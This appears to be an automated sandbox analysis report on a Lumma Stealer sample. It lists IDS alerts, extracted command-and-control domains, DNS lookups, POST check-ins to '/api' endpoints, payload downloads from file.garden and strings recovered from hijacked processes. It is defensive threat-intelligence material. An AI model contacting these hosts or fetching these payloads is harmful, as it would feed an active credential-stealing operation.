
Source: Network traffic	Suricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.10:62005 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.10:63652 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.10:49520 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.10:65184 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.10:58599 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.10:51044 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.10:49789 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.10:51291 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.10:62402 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49719 -> 172.67.197.40:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49719 -> 172.67.197.40:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49726 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49726 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49733 -> 172.67.197.40:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49733 -> 172.67.197.40:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49728 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49728 -> 104.21.1.169:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: agentyanlark.site
Source: Malware configuration extractor	URLs: delaylacedmn.site
Source: Malware configuration extractor	URLs: famikyjdiag.site
Source: Malware configuration extractor	URLs: possiwreeste.site
Source: Malware configuration extractor	URLs: explorationmsn.stor
Source: Malware configuration extractor	URLs: commandejorsk.site
Source: Malware configuration extractor	URLs: underlinemdsj.site
Source: Malware configuration extractor	URLs: writekdmsnu.site
Source: Malware configuration extractor	URLs: bellykmrebk.site

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: delaylacedmn.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: writekdmsnu.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bellykmrebk.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: commandejorsk.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zelensky.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: famikyjdiag.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: possiwreeste.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: agentyanlark.site replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: explorationmsn.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Speech\imxyvi.exe

Code function: 28_2_00007FF6A9517EC0 InternetOpenA,?_Random_device@std@@YAIXZ,_Query_perf_frequency,_Query_perf_counter,log,cos,sin,exp,pow,tan,memset,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,InternetOpenUrlA,InternetReadFile,memcpy,memset,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,

28_2_00007FF6A9517EC0

Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/1/imxyvi.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/build.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=db1d43d614fdfcd029bd4655; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34678Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 30 Sep 2024 16:20:27 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: d.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' equals www.youtube.com (Youtube)
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: static.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: file.garden
Source: global traffic	DNS traffic detected: DNS query: tiddymarktwo.shop
Source: global traffic	DNS traffic detected: DNS query: surveriysiop.shop
Source: global traffic	DNS traffic detected: DNS query: captainynfanw.shop
Source: global traffic	DNS traffic detected: DNS query: tearrybyiwo.shop
Source: global traffic	DNS traffic detected: DNS query: appleboltelwk.shop
Source: global traffic	DNS traffic detected: DNS query: tendencerangej.shop
Source: global traffic	DNS traffic detected: DNS query: fossillargeiw.shop
Source: global traffic	DNS traffic detected: DNS query: coursedonnyre.shop
Source: global traffic	DNS traffic detected: DNS query: strappystyio.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: offeviablwke.site
Source: global traffic	DNS traffic detected: DNS query: explorationmsn.store
Source: global traffic	DNS traffic detected: DNS query: famikyjdiag.site
Source: global traffic	DNS traffic detected: DNS query: possiwreeste.site
Source: global traffic	DNS traffic detected: DNS query: commandejorsk.site
Source: global traffic	DNS traffic detected: DNS query: underlinemdsj.site
Source: global traffic	DNS traffic detected: DNS query: bellykmrebk.site
Source: global traffic	DNS traffic detected: DNS query: agentyanlark.site
Source: global traffic	DNS traffic detected: DNS query: writekdmsnu.site
Source: global traffic	DNS traffic detected: DNS query: delaylacedmn.site
Source: global traffic	DNS traffic detected: DNS query: zelensky.top

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site

Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.46.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://agentyanlark.site/api
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/api
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/api$
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/api2
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/apii
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/l1
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/t1
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akam
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://commandejorsk.site/L1_
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://commandejorsk.site/apis
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 0000002F.00000002.1499818933.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/ima
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
